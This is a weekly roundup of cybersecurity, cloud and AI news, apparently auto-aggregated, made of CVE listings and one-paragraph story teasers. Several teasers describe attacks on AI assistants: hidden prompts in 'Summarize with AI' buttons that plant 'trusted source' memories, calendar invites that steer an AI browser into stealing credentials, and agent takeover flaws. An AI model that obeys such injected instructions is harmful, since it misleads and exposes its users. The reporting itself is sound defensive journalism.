Weekly Scan: Cloud, Cybersecurity, AI News — Mar 05, 2026

This week's critical security updates and vulnerability disclosures:

• CVE-2024-50629 (7 mentions, 7 sources)
📰 View all 7 sources covering this story ▼

1. Intruder Intel CVE Feed — CVE-2024-50629 (Mar 07, 04:17)
2. Intruder Intel CVE Feed — CVE-2025-38352 (Mar 07, 04:17)
3. Intruder Intel CVE Feed — CVE-2025-25257 (Mar 07, 04:17)
4. Intruder Intel CVE Feed — CVE-2024-46982 (Mar 07, 04:17)
5. Intruder Intel CVE Feed — CVE-2025-43529 (Mar 07, 04:17)
6. Intruder Intel CVE Feed — CVE-2024-30085 (Mar 07, 04:17)
7. Intruder Intel CVE Feed — CVE-2025-36911 (Mar 07, 04:17)

First reported: Mar 07, 04:17

• CVE-2026-3675 | Freedom Factory dGEN1 up to 20260221 org.ethosmobile.ethoslauncher FakeAppReceiver improper authorization (3 mentions, 3 sources)
📰 View all 3 sources covering this story ▼

1. VulnDB — CVE-2026-3667 | Freedom Factory dGEN1 up to 20260221 org.ethosmobile.ethoslaunch… (Mar 06, 20:58)
2. VulnDB — CVE-2026-3674 | Freedom Factory dGEN1 up to 20260221 org.ethosmobile.ethoslaunch… (Mar 06, 21:20)
3. VulnDB — CVE-2026-3675 | Freedom Factory dGEN1 up to 20260221 org.ethosmobile.ethoslaunch… (Mar 06, 21:20)

First reported: Mar 06, 20:58 | Last update: Mar 06, 21:20

• CVE-2025-69652 | GNU Binutils up to 2.46 readelf process_debug_info denial of service (3 mentions, 3 sources)
📰 View all 3 sources covering this story ▼

1. VulnDB — CVE-2025-69651 | GNU Binutils up to 2.46 readelf process_got_section_contents de… (Mar 06, 20:11)
2. VulnDB — CVE-2025-69650 | GNU Binutils up to 2.46 readelf process_got_section_contents de… (Mar 06, 20:15)
3. VulnDB — CVE-2025-69652 | GNU Binutils up to 2.46 readelf process_debug_info denial of se… (Mar 06, 20:15)

First reported: Mar 06, 20:11 | Last update: Mar 06, 20:15

For Data Breach Today, I spoke with Anna Delaney about threat modeling for issues that are in the news right now.

The FBI, CISA, and NSA reportedly are investigating the hack by an unnamed "sophisticated" actor of a FBI surveillance system that holds sensitive information. The breach carries the hallmarks of Chinese nation-state groups and comes amid concerns...

Iran-linked APT MuddyWater targeted U.S. organizations, deploying the new Dindoor backdoor across sectors including banks, airports, and nonprofits. Broadcom’s Symantec Threat Hunter Team uncovered a campaign by the Iran-linked MuddyWater (aka See...

The long, strange trip of a large assembly of advanced iOS exploits.

In a co-ordinated public-private operation between law enforcement agencies and cybersecurity industry partners, Tycoon 2FA - one of the world's most prolific phishing-as-a-service platforms - has been dismantled. Read more in my article on the Ho...

See how Balyasny built an AI research system with GPT-5.4, rigorous model evaluation, and agent workflows to transform investment analysis at scale.

This is today’s edition of The Download, our weekday newsletter that provides a daily dose of what’s going on in the world of technology. Online harassment is entering its AI era Scott Shambaugh didn’t think twice when he denied an AI agent’s request to contribute to matplotlib, a software librar...

OpenAI introduces CoT-Control and finds reasoning models struggle to control their chains of thought, reinforcing monitorability as an AI safety safeguard.

Introducing GPT-5.4, OpenAI’s most most capable and efficient frontier model for professional work, with state-of-the-art coding, computer use, tool search, and 1M-token context.

OpenAI introduces ChatGPT for Excel and new financial app integrations, powered by GPT-5.4 to accelerate modeling, research, and analysis in regulated environments.

This is today’s edition of The Download, our weekday newsletter that provides a daily dose of what’s going on in the world of technology. Listen to Earth’s rumbling, secret soundtrack The boom of a calving glacier. The crackling rumble of a wildfire. The roar of a surging storm front. They’re the...

A new preprint extends single-minus amplitudes to gravitons, with GPT-5.2 Pro helping derive and verify nonzero graviton tree amplitudes in quantum gravity.

Artificial intelligence is no longer just powering defensive cybersecurity tools, it is reshaping the entire threat landscape. AI is accelerating reconnaissance, improving the realism of phishing, automating malware mutation, and enabling adaptive attack techniques. At the same time, enterprises ...

Amazon Connect Health is now generally available, bringing purpose-built agentic AI to healthcare organizations to streamline patient engagement and point-of-care workflows. Amazon Connect Health delivers five AI agents designed to reduce administrative burden across the care continuum — enabling...

We’re excited to announce Amazon GameLift Servers DDoS Protection, a new feature that helps game developers protect session-based multiplayer games that utilize Amazon GameLift Servers to help improve overall game session resiliency. DDoS Protection is designed to defend against denial-of-service...

AWS Config now supports 30 additional AWS resource types across key services including Amazon Bedrock AgentCore and Amazon Cognito. This expansion provides greater coverage over your AWS environment, enabling you to more effectively discover, assess, audit, and remediate an even broader range of ...

LLM-driven vuln finding has reached an inflection

What can the Bitlocker story tell us about risk?

GPS attacks trigger revisiting threat models

What if we think about LLM coding as if it’s a compiler stage?

The CRA is coming and it's going to be a dramatic change for technology producers

Thinking of threat modeling with a knob helps you get more out of it.

Thoughts on the CVE funding crisis

Grateful to introduce the Hackers' Almanack!

A group of us have urged HHS to require better handling of security reports

Some thoughts on the Voyager Episode ‘Inside Man’

One of the things we expect of a politician in a civilized country is that they put their country first.

The most important stories around threat modeling, appsec and secure by design for June, 2024.

Why is it hard to count lockbit infections?

Making an LLM forget is harder than it seems

Other people have written about the CSRB report, and I wanted to share their perspectives.

The CSRB has released its report into an intrusion at Microsoft, and...it’s a doozy.

The NVD is in crisis, and so is patch management. It’s time to modernize.

Solving hallucinations in legal briefs is playing on easy mode —— and still too hard

Red Teaming by Bryce Hoffman is a thought-provoking read.

Comments following the Senate’s CSRB hearing

The FDA has released their new guidance, which will be broadly impactful.

My latest at Dark Reading draws attention to how Microsoft can fix ransomware tomorrow.

Phishing behaviors, as observed in the wild.

Tarah Wheeler and Adam write in CFR

This month is all about memory safety, unless you’re a standards group.

External changes will be driving appsec in 2023. It’s time to frame the decisions in front of you.

Pointer to Adam’s latest Darkreading article

Text captured from GPT-3

A few lessons from the Mazda radio incident.

What happened when Microsoft tried to buy climate abatements

Time flies and things change... A look back on the growth of this industry.

Arbitrarily powerful software -- applications, operating systems -- is a problem, as is preventing it from running on enterprise systems.

The Colonial Pipeline shutdown story is interesting in all sorts of ways, and I can't delve into all of it.I did want to talk about one small aspect, which is the way responders talk about Darkside.

“It depends on your threat model...”

The timing of updates is not coincidental.

Thoughts on the issues with the Ever Given blocking the Suez Canal.

You may have noticed that my end of the year posts are all science focused. Today, a set of resources on the COVID vaccines.

Help me help you...

A recent talk by Alyssa Miller focuses on integrating threat modeling in devops.

As I built out my home studio to record videos for my distributed classes, I was lucky enough to be able to find an in-stock HDMI capture card, but those are harder and harder to find. As it turns out, you may be able to avoid the need for that with a mix of apps.

Just a few things for now

Sharing for you, bookmarking for me.

There are a couple of new, short (4-page), interesting papers from a team at KU Leuven discussin the building blocks of threat modeling.

Today is the last Star Wars Day before Episode 9 comes out, and brings the Skywalker saga to its end.

A resource for those developing games.

Over-inflated numbers won't scare me into buying your ‘solution’.

Discussing the value of Security Advisory Boards

[no description provided]

[no description provided]

[no description provided]

[no description provided]

[no description provided]

[no description provided]

[no description provided]

[no description provided]

[no description provided]

[no description provided]

[no description provided]

[no description provided]

[no description provided]

[no description provided]

[no description provided]

[no description provided]

[no description provided]

[no description provided]

[no description provided]

[no description provided]

[no description provided]

There are a number of reports out recently, breathlessly presenting their analysis of one threatening group of baddies or another. Most readers should, at most, skim their analysis of the perpetrators. Read on for why.

The administration also released an executive order on cybercrime and fraud. The post The long-awaited Trump cyber strategy has arrived appeared first on CyberScoop .

Attackers have turned AI into a “force multiplier” for the country’s expansive scheme to get and keep operatives hired at global companies, researchers said. The post Microsoft warns North Korean threat groups are scaling up fake worker schemes with generative AI appeared first on CyberScoop .

A popular WordPress plugin can be abused to take over websites - with thousands of sites reportedly vulnerable.

CISA ordered U.S. federal agencies to patch three iOS security flaws targeted in cyberespionage and crypto-theft attacks using the Coruna exploit kit. [...]

The Pakistan-aligned threat actor known as Transparent Tribe has become the latest hacking group to embrace artificial intelligence (AI)-powered coding tools to strike targets with various implants. The activity is designed to produce a "high-volume, mediocre mass of implants" that are developed ...

Threat actors are employing a new variation of the ClickFix social engineering technique called InstallFix to convince users into running malicious commands under the pretext of installing legitimate command line interface (CLI) tools. [...]

Cybersecurity researchers have disclosed details of a multi-stage malware campaign that uses batch scripts as a pathway to deliver various encrypted remote access trojan (RATs) payloads that correspond to XWorm, AsyncRAT, and Xeno RAT. The stealthy attack chain has been codenamed VOID#GEIST by Se...

A House committee reauthorized an Energy Department program that funnels hundreds of millions of dollars and cybersecurity assistance to rural electric utilities. The post Congress looks to revive critical cyber program for rural electric utilities appeared first on CyberScoop .

An Iran-linked hacking group has been active inside the networks of several US organizations since early February, raising concerns that the activity could precede broader cyber operations connected to escalating geopolitical tensions in the Middle East. New backdoors used by Seedworm Symantec an...

The nation-state-grade iOS exploit kit targets 23 vulnerabilities affecting iOS 13 to 17.2.1. The post CISA Adds iOS Flaws From Coruna Exploit Kit to KEV List appeared first on SecurityWeek .

Microsoft warns of ClickFix campaign using Windows Terminal to deliver Lumma Stealer via social engineering attacks. Microsoft revealed a new ClickFix campaign where attackers exploit Windows Terminal to run a complex attack chain, ultimately deploying Lumma Stealer malware. The campaign uses soc...

What would you do if you could eavesdrop on an ongoing social engineering attack against your LastPass account?

Cisco patches 48 vulnerabilities in Secure Firewall products, including two critical CVSS 10 flaws that could allow authentication bypass and remote code execution.

The attacks, observed since February, show that Iranian hackers already have a presence in the networks of US organizations. The post Iranian APT Hacked US Airport, Bank, Software Company appeared first on SecurityWeek .

Hexnode has announced the launch of Hexnode IdP. By introducing this native identity layer, Hexnode delivers enterprise-grade authentication and identity management within a single, unified framework. While debuting as a dedicated Identity Provider (IdP), the solution marks a significant expansio...

A Ghanaian national pleaded guilty to his role in a massive fraud ring that stole over $100 million from victims across the United States through business email compromise attacks and romance scams. [...]

Cyolo has released Cyolo PRO (Privileged Remote Operations) v7.0, a major update that expands OT-first secure remote access and strengthens protection for critical infrastructure and industrial environments without disrupting operations. Secure remote access (SRA) tools focus primarily on managin...

Cursor Automations, the always-on agent platform from Cursor, is expanding with a new generation of autonomous systems that streamline code review, incident response, and other engineering workflows. The platform runs AI agents on schedules or in response to development events. These triggers inc...

A campaign by Iran-linked group Dust Specter is targeting Iraqi officials with phishing emails delivering new malware families. Zscaler ThreatLabz researchers linked the Iran-nexus group Dust Specter to a campaign targeting Iraqi government officials. Threat actors impersonated the country’s Mini...

In the midst of recent developments and controversies surrounding a contract with the U.S. Department of Defense, OpenAI released the GPT-5.4 model. The release comes at a time when users are reportedly leaving ChatGPT for rival chatbots, particularly Anthropic’s Claude. GPT-5.4 is rolling out gr...

The Hollywood image of criminal hackers being largely teenage ne’er do wells is due for an update. That’s because profit-seeking career criminals — often approaching middle age — make up the largest cohort of today’s cybercriminals, according to an analysis of criminal cases carried out by Orange...

U.S. Cybersecurity and Infrastructure Security Agency (CISA) adds Apple, Rockwell, and Hikvision flaws to its Known Exploited Vulnerabilities catalog. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added Apple, Rockwell, and Hikvision flaws to its Known Exploited Vulnerabilities...

Developers and analysts are using more AI tools to produce code and to test both the performance and security of the finished products. They are also embedding AI functionality in their products directly. But just how secure are these AI tools and routines themselves? Recent reports show they suf...

A China-linked advanced persistent threat (APT) actor has been targeting critical telecommunications infrastructure in South America since 2024, targeting Windows and Linux systems and edge devices with three different implants. The activity is being tracked by Cisco Talos under the moniker UAT-9...

Google’s GTIG reports 90 zero-day vulnerabilities exploited in the wild in 2025, up from 78 in 2024, with a growing share targeting enterprise systems. Google’s Threat Intelligence Group (GTIG) identified 90 zero-day vulnerabilities exploited in the wild in 2025. While slightly below the 100 obse...

Business email compromise (BEC) and funds transfer fraud combined for 58% of all cyber insurance claims filed in 2025, according to data from Coalition covering more than 100,000 policyholders across the United States, Canada, the United Kingdom, Australia, and Germany. BEC was the single most co...

Google tracked 90 vulnerabilities exploited as zero-days last year, with Chinese cyberespionage groups doubling their count from 2024 and commercial surveillance vendors overtaking state-sponsored hackers for the first time. Nearly half of the recorded zero-days targeted enterprise technologies s...

In this Help Net Security video, Gal Livschitz, Senior Penetration Tester at Terra Security, explains how phishing has evolved and why employees still fall for it. He outlines how phishing now uses HTTPS, branded pages, and lookalike domains, making attacks harder to spot. He highlights communica...

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Thursday added two security flaws impacting Hikvision and Rockwell Automation products to its Known Exploited Vulnerabilities (KEV) catalog, citing evidence of active exploitation. The critical-severity vulnerabilities are listed...

Managed Security Service Provider können das Sicherheitsniveau nachhaltig steigern. Godlikeart | shutterstock.com Ein Managed Security Service Provider (MSSP) bietet seinen Kunden ein umfassendes Spektrum an Sicherheits-Services. Als Drittanbieter kann ein MSSP die Arbeitsbelastung der internen I...

Deutsche Unternehmen müssen sich warm anziehen: Sowohl staatliche als auch „private“ Akteure haben es auf sie abgesehen. Shutterstock Wie die Experten von Darktrace in ihrem aktuellen Threat Report 2026 darstellen, bleiben Cloud- und E-Mail-Konten das Einfallstor Nummer Eins in Europa. Dem Berich...

Iran attempts to hack security cameras to support its missile strikes, Israel bombs Iran’s cyber headquarters, authorities take down LeakBase and Tycoon 2FA, and TikTok says ‘no’ to encrypted private messaging.

A China-linked advanced persistent threat actor tracked as UAT-9244 has been targeting telecommunication service providers in South America since 2024, compromising Windows, Linux, and network-edge devices. [...]

Pakistan's APT36 threat group has begun using vibe-coding to churn out mediocre malware, but at a scale that could overwhelm defenses.

The phishing-as-a-service platform was popular among cyber threat actors because of its ability to bypass multifactor authentication defenses.

The bureau didn’t provide any further details on the incident, which reportedly targeted a network for managing surveillance activity. The post FBI targeted with ‘suspicious’ activity on its networks appeared first on CyberScoop .

The Wikimedia Foundation suffered a security incident today after a self-propagating JavaScript worm began vandalizing pages and modifying user scripts across multiple wikis. [...]

Edge bugs are so fetch, and Cisco just patched 50 new ones, including some heavy hitters with 10 out of 10 scores on the CVSS scale.

OpenClaw's popularity is proving to be a great vessel for malware distribution, especially when it's advertised via Bing.

Hackers are exploiting a critical vulnerability in the User Registration & Membership plugin, which is installed on more than 60,000 WordPress sites. [...]

​A U.S. government contractor's son, accused of stealing more than $46 million in cryptocurrency from the U.S. Marshals Service, was arrested Wednesday on the island of Saint Martin. [...]

The 43-year-old Russian national ran a ransomware operation that impacted more than 1,000 victims globally. The conspiracy netted more than $39 million in extortion payments. The post Phobos ransomware leader pleads guilty, faces up to 20 years in prison appeared first on CyberScoop .

Researchers at Zenity Labs uncover PleaseFix flaws in Perplexity’s Comet browser. See how zero-click calendar invites allow AI agents to steal 1Password credentials and personal files.

Organizations can borrow secure-by-design processes to manage non-technical challenges like governance or the inevitable human error.

The vendor said it’s not aware of any active exploitation of the vulnerabilities, which could allow remote attackers to achieve root access and execute code. The post Cisco reveals 2 max-severity defects in firewall management software appeared first on CyberScoop .

Cisco has disclosed that two more vulnerabilities affecting Catalyst SD-WAN Manager (formerly SD-WAN vManage) have come under active exploitation in the wild. The vulnerabilities in question are listed below - CVE-2026-20122 (CVSS score: 7.1) - An arbitrary file overwrite vulnerability that could...

Google Threat Intelligence Group (GTIG) tracked 90 zero-day vulnerabilities actively exploited throughout 2025, almost half of them in enterprise software and appliances. [...]

The browser is becoming the operating system for modern work, yet many enterprises still treat it as an extension of network or endpoint security. Keep Aware's 2026 State of Browser Security Report shows 41% of employees used AI web tools while browser-based phishing, extensions, and social engin...

Less than half of the total zero-days have been attributed to a threat actor, but spyware vendors and China are in the lead. The post Google: Half of 2025’s 90 Exploited Zero-Days Aimed at Enterprises appeared first on SecurityWeek .

Researchers uncovered a Russian campaign targeting Ukrainian entities with new malware families BadPaw and MeowMeow delivered through phishing emails. Researchers reported a phishing campaign linked to Russia that targets Ukrainian organizations using two new malware families, BadPaw and MeowMeow...

With AI enabling fully automated cyber attacks, cyber resiliency has emerged as a critical strategy.

Europol seizes LeakBase cybercrime and hacker forum used to trade stolen data, disrupting a global platform with over 140,000 members.

Europol koordinierte den Schlag gegen Leakbase. PixelBiss – shutterstock.com Die Polizei von Amsterdam hat im Zuge einer internationalen Aktion laut Europol einen der weltweit größten Handelsplätze für gestohlene Daten geschlossen. Leakbase hatte weltweit 142.000 registrierte Nutzer, wie die euro...

Europol and partners dismantle Tycoon 2FA phishing service used to bypass MFA, disrupting a global phishing-as-a-service operation targeting organisations.

Evgenii Ptitsyn was extradited to the United States from South Korea in November 2024. The post Russian Ransomware Operator Pleads Guilty in US appeared first on SecurityWeek .

Exploit kit "Coruna" targets iPhones running iOS 13.0 to 17.2.1, focusing on financial data theft

A suspected Iran-nexus threat actor has been attributed to a campaign targeting government officials in Iraq by impersonating the country's Ministry of Foreign Affairs to deliver a set of never-before-seen malware. Zscaler ThreatLabz, which observed the activity in January 2026, is tracking the c...

Organizations typically roll out multi-factor authentication (MFA) and assume stolen passwords are no longer enough to access systems. In Windows environments, that assumption is often wrong. Attackers still compromise networks every day using valid credentials. The issue is not MFA itself, but c...

Ox Security warns that Mail2Shell could enable threat actors to hijack FreeScout systems without user interaction

The website was taken offline, and potential members arrested.

Cybersecurity researchers have disclosed details of a new Russian cyber campaign that has targeted Ukrainian entities with two previously undocumented malware families named BadPaw and MeowMeow. "The attack chain initiates with a phishing email containing a link to a ZIP archive. Once extracted, ...

Tycoon 2FA is no more thanks to a major law enforcement operation.

A global operation has resulted in the takedown of popular cybercrime forum LeakBase

Tycoon 2FA, one of the prominent phishing-as-a-service (PhaaS) toolkits that allowed cybercriminals to stage adversary-in-the-middle (AitM) credential harvesting attacks at scale, was dismantled by a coalition of law enforcement agencies and security companies. The subscription-based phishing kit...

A joint law enforcement operation has dismantled LeakBase, one of the world's largest online forums for cybercriminals to buy and sell stolen data and cybercrime tools. The LeakBase forum, per the U.S. Department of Justice (DoJ), had over 142,000 members and more than 215,000 messages between me...

Zomato’s “Friend Recommendations” API allows unilateral contact syncing. By uploading a phone number, bad actors can extract a user’’ restaurant recommendation history and restaurant coordinates. By mapping overlapping delivery radii, an attacker can estimate a user's approximate physical locatio...

The infrastructure hosting the Tycoon2FA service, which Europol said was among the largest phishing operations worldwide, has been taken down by a coalition of IT companies and law enforcement agencies. At least temporarily, this removes access to one more tool for evading multifactor authenticat...

Microsoft, which led the effort, said it seized 330 domains that powered the phishing platform’s core infrastructure. The alleged creator was also named in a civil complaint. The post Global coalition dismantles Tycoon 2FA phishing kit appeared first on CyberScoop .

Exploitation of the command injection flaw in VMware Aria Operations could grant an attacker broad acess to victims' cloud environments.

The author of a new study told CyberScoop he's "very worried,” describing deanonymization capabilities of AI as a “large scale invasion of privacy.” The post LLMs are getting better at unmasking people online appeared first on CyberScoop .

Cybersecurity researchers have warned of a surge in retaliatory hacktivist activity following the U.S.-Israel coordinated military campaign against Iran, codenamed Epic Fury and Roaring Lion. "The hacktivist threat in the Middle East is highly lopsided, with two groups, Keymous+ and DieNet, drivi...

Law enforcers and industry partners have taken down notorious phishing-as-a-service platform Tycoon2FA

FulcrumSec leaked roughly 2GB of company data, but LexisNexis says it's old and outdated.

Dark Reading Confidential Episode 15: Interpol relied on Will Thomas and team to help break up a sprawling cybercrime ring, leading to the arrest of 574 suspects, the recovery of more than $3 million, and the decryption of six malware variants. Here's his story.

Increased attempts to compromise surveillance cameras linked to Iran during Middle East conflict

Malware campaign uses Ukrainian email service for credibility, deploying "BadPaw" to execute attacks

Google said it identified a "new and powerful" exploit kit dubbed Coruna (aka CryptoWaters) targeting Apple iPhone models running iOS versions between 13.0 and 17.2.1. The exploit kit featured five full iOS exploit chains and a total of 23 exploits, Google Threat Intelligence Group (GTIG) said. I...

Ransomware operators Anubis claimed the breach, saying it stole 170GB of sensitive data

Microsoft is reporting : Companies are embedding hidden instructions in “Summarize with AI” buttons that, when clicked, attempt to inject persistence commands into an AI assistant’s memory via URL prompt parameters…. These prompts instruct the AI to “remember [Company] as a trusted source” or “re...

A software supplier to France's health ministry was breached, with some very private information possible leaked.

As AI becomes the central engine for enterprise productivity, security leaders are finally getting the green light — and the budget — to secure it. But there’s a quiet crisis unfolding in the boardroom: many organizations know they need "AI Governance," but they have no idea what they are actuall...

The emerging actor, part of the APT41 nexus, gains initial access via phishing, and uses legitimate network services to obscure cyber espionage activities.

The OpenID Foundation warns that fragmented policies on posthumous digital accounts could open the door for fraudsters to exploit AI deepfakes

Cybersecurity researchers have flagged malicious Packagist PHP packages masquerading as Laravel utilities that act as a conduit for a cross-platform remote access trojan (RAT) that's functional on Windows, macOS, and Linux systems. The names of the packages are listed below - nhattuanbl/lara-help...

Cybersecurity researchers have disclosed details of an advanced persistent threat (APT) group dubbed Silver Dragon that has been linked to cyber attacks targeting entities in Europe and Southeast Asia since at least mid-2024. "Silver Dragon gains its initial access by exploiting public-facing int...

On this week’s show, Patrick Gray, Adam Boileau and James WIlson discuss the week’s cybersecurity news. They cover: The US-Israeli attack on Iran had a whole lot of cyber. It’s clearly in the playbook now! The NSA Triangulation / L3 Harris Trenchant iOS exploit kit is on the loose, and being used...

Security researchers say exploits used by governments to hack into iPhones have been found to be used by cybercriminals. They warned of an emerging market for "secondhand" exploits.

The US conducted cyberattacks ahead of strikes on Iran, Russia aims for internet independence by 2028, Google finds a new iOS exploit kit in the wild, and Chrome moves to a two-week release cycle.

India-nexus cyber threat actors are growing more active and sophisticated, using custom tools coded in Rust and cloud-based command and control.

Don't leave your OpenClaw with an easy password, experts warn.

The exploitation activity against CVE-2026-21385, a high-severity memory corruption flaw, could be tied to commercial spyware or nation-state threat groups.

Threat hunters have called attention to a new campaign as part of which bad actors masqueraded as fake IT support to deliver the Havoc command-and-control (C2) framework as a precursor to data exfiltration or ransomware attack. The intrusions, identified by Huntress last month across five partner...

AI coding is the new reality — and it will further destabilize software supply chain security. So step up your AppSec.

An OAuth feature is being abused in the wild to drop malware to people's computers.

Every CISO knows the uncomfortable truth about their Security Operations Center: the people most responsible for catching threats in real time are the people with the least experience. Tier 1 analysts sit at the front line of detection, and yet they are also the most vulnerable to the cognitive a...

The threat actor behind the recently disclosed artificial intelligence (AI)-assisted campaign targeting Fortinet FortiGate appliances leveraged an open-source, AI-native security testing platform called CyberStrikeAI to execute the attacks. The new findings come from Team Cymru, which detected it...

Security researchers found a zero-click exploit in Perplexity AI browser, and helped fix it.

Hackers don't need an app to steal login credentials anymore - a PWA will do.

Cybersecurity researchers have disclosed details of a new phishing suite called Starkiller that proxies legitimate login pages to bypass multi-factor authentication (MFA) protections. It's advertised as a cybercrime platform by a threat group calling itself Jinkusu, granting customers access to a...

Zscaler ThreatLabz assessed with medium to high confidence that an Iranian adversary targeted Iraq’s Ministry of Foreign Affairs in a new cyber-attack

Microsoft on Monday warned of phishing campaigns that employ phishing emails and OAuth URL redirection mechanisms to bypass conventional phishing defenses implemented in email and browsers. The activity, the company said, targets government and public-sector organizations with the end goal of red...

The threat activity cluster known as SloppyLemming has been attributed to a fresh set of attacks targeting government entities and critical infrastructure operators in Pakistan and Bangladesh. The activity, per Arctic Wolf, took place between January 2025 and January 2026. It involves the use of ...

Cybercriminals exploit the .arpa domain and IPv6 addresses to deliver phishing pages, bypassing traditional security and stealing credentials.

Cybercriminal group SLSH recruits women to impersonate IT helpdesks, offering up to $1,000 per call while targeting major companies.

Cybersecurity researchers have disclosed details of a now-patched security flaw in Google Chrome that could have permitted attackers to escalate privileges and gain access to local files on the system. The vulnerability, tracked as CVE-2026-0628 (CVSS score: 8.8), has been described as a case of ...

John Hultquist suggests “aggressive” Iranian cyber attackers will target the US and its Gulf allies with plausibly deniable ransomware attacks, hacktivist campaigns and more

Turns out that LLMs are good at de-anonymization: We show that LLM agents can figure out who you are from your anonymous online posts. Across Hacker News, Reddit, LinkedIn, and anonymized interview transcripts, our method identifies users with high precision ­ and scales to tens of thousands of c...

Oasis Security reveals how a new ClawJacked vulnerability could allow attackers to silently take over a victim’s OpenClaw agent

Chainalysis reveals a big surge in median ransomware payment size in 2025 despite overall drop in criminal revenue

Attackers could have exploited the vulnerability to escalate privileges, violate user privacy while browsing, and access sensitive resources.

Cybersecurity researchers have disclosed a new iteration of the ongoing Contagious Interview campaign, where the North Korean threat actors have published a set of 26 malicious packages to the npm registry. The packages masquerade as developer tools, but contain functionality to extract the actua...

LLMs can deanonymize internet users based on their comments, CISA gets a new acting director, hackers steal 15 million records from the French Ministry of Health, and Google takes down an ad fraud botnet.

How businesses can master migration-led migration, including key steps like mapping and securing long-term governance.

Oblivion is an Android RAT which bypasses permissions, intercepts messages, and enables hidden remote control across devices from Samsung, Xiaomi, and OPPO.

OpenClaw has fixed a high-severity security issue that, if successfully exploited, could have allowed a malicious website to connect to a locally running artificial intelligence (AI) agent and take over control. "Our vulnerability lives in the core system itself – no plugins, no marketplace, no u...

In early January 2026, KrebsOnSecurity revealed how a security researcher disclosed a vulnerability that was used to assemble Kimwolf, the world's largest and most disruptive botnet. Since then, the person in control of Kimwolf -- who goes by the handle "Dort" -- has coordinated a barrage of dist...

Cybercriminal networks resell real travel bookings bought with stolen credit cards.

Guardicore Labs uncovers a Ransomware detection campaign targeting MySQL servers. Attackers use Double Extortion and publish data to pressure victims.

Our deception technology is able to reroute attackers into honeypots, where they believe that they found their real target. The attacks brute forced passwords for RDP credentials to connect to the victim download and execute a previously undetected malware, which we named Trojan.sysscan.

Guardicore security researchers describe and uncover a full analysis of a cryptomining attack, which hid a cryptominer inside WAV files. The report includes the full attack vectors, from detection, infection, network propagation and malware analysis and recommendations for optimizing incident res...

In-depth analysis of threat activity we call CL-UNK-1068. We discuss their toolset, including tunneling, reconnaissance and credential theft. The post An Investigation Into Years of Undetected Operations Targeting High-Value Sectors appeared first on Unit 42 .

Statistics on Android malware and the most notable mobile threats of 2025: preinstalled backdoors Keenadu and Triada, spyware Trojans, the Kimwolf IoT botnet, and Mamont banking Trojans.

Unit 42 details recent Iranian cyberattack activity, sharing direct observations of phishing, hacktivist activity and cybercrime. We include recommendations for defenders. The post Threat Brief: March 2026 Escalation of Cyber Risk Related to Iran appeared first on Unit 42 .

A high-severity CVE-2026-0628 in Chrome's Gemini allowed local file access and privacy invasion. Google quickly patched the flaw. The post Taming Agentic Browsers: Vulnerability in Chrome Allowed Extensions to Hijack New Gemini Panel appeared first on Unit 42 .

Insights and recommended defensive measures from Sophos X-Ops Counter Threat Unit Categories: Security Operations Tags: Sophos CTU, Iran, Operation Epic Fury

Researchers have found evidence the rat lungworm is now endemic in southern California

Now if only device makers would deliver higher quality components Thanks to Anthropic's AI and its bug-detecting abilities, Firefox users can now enjoy stronger security. Unfortunately, if browser crashes rather than security flaws are the problem, Claude probably can't help.…

Governance, when handled correctly, can become a route to the successful implementation of emerging technologies. Five business leaders share their experiences.

GPT just keeps getting better at mathematics, increasingly solving the trickiest of problems. In January, AI testing company Epoch AI found that a previous version of the AI model, GPT-5.2 Pro had solved 31% of its mathematical challenges, a rise from the previous score best of 19%. The newest ve...

Switchzilla says flaws could allow file overwrites or privilege escalation Just when network admins thought the Cisco SD-WAN patch queue might finally be shrinking, Switchzilla has confirmed miscreants are exploiting more vulnerabilities in its SD-WAN management software.…

Crooks tweak familiar copy-paste ruse so that victims run malicious commands themselves A new twist on the long-running ClickFix scam is now tricking Windows users into launching Windows Terminal and pasting malware into it themselves – handing the credential-stealing Lumma infostealer the keys t...

I love my home state of California. But sometimes its best intentions go awry. It’s not surprising that California’s legislature passed the Digital Age Assurance Act ( AB 1043 ) last October—age verification is currently a popular focus within governments. (And the reason for Discord’s current st...

AI developers must obtain licenses for copyrighted material before using it to train models, a committee of the House of Lords, the UK Parliament’s upper chamber, said Thursday. The committee called the approach “licensing-first,” meaning no training on protected works without prior permission an...

When Anthropic published a blog post last week describing how Claude Code can analyze and translate COBOL, the market rejoiced at yet another proof point of the power of LLMs. Critics also reacted swiftly, noting that translating COBOL is not the same as modernizing a system. After all, a system ...

Released from the curse of the update bork fairy Microsoft has finally fixed a Windows Recovery Environment (WinRE) bug it introduced in Windows 10's final update.…

It promised £1.15B… but finance ministry yet to show 'formal commitment' to adopt Workday SaaS, watchdog says The UK's Treasury is yet to fully commit to joining a multi-billion pound ERP and HR shared services program it has agreed to fund, potentially slashing any resulting savings, according t...

Mientras que C-3PO era ciencia ficción en la primera película de Star Wars en 1977, los robots humanoides ya son una realidad en las naves de producción de BMW. Tras introducir Figure 2 en la planta de Spartanburg, en Estados Unidos, BMW también está desplegando robots humanoides en su planta ale...

It’s ok, Todd. You’re only paranoid if you’re wrong. Okta chairman and CEO Todd McKinnon said he believes it would be difficult for an LLM alone to replicate the quality of SaaS applications his company provides, but that doesn’t stop him from worrying about competition from bots.…

Instead of the expected new major version Chrome 146, Google just released another update for Chrome 145 (presumably this version’s final security update). In the new Chrome versions 145.0.7632.159/160 for Windows and macOS and 145.0.7632.159 for Linux, the developers have fixed 10 security vulne...

대형 AI 솔루션 업체와 결제 플랫폼, 유통사가 잇달아 에이전틱 결제(agentic payments)를 내놓고 있다. 고객에게는 ‘클릭 몇 번’의 편의가 늘지만, 기업 입장에서는 브랜드 통제력 약화부터 보안·재무 리스크까지 감수할 가치가 있는지 따져봐야 하는 상황이다. 챗GPT는 이미 제품 검색의 ‘첫 번째 선택지’로 빠르게 자리 잡고 있다. 구글이 먼저 치고 나가지 않는다면, 결제까지 챗GPT가 처리하는 흐름이 곧 현실이 될 수 있다는 관측도 나온다. 하지만 가맹점에는 부담이 커질 수 있다. 고객 경험의 주도권을 잃고, 오작...

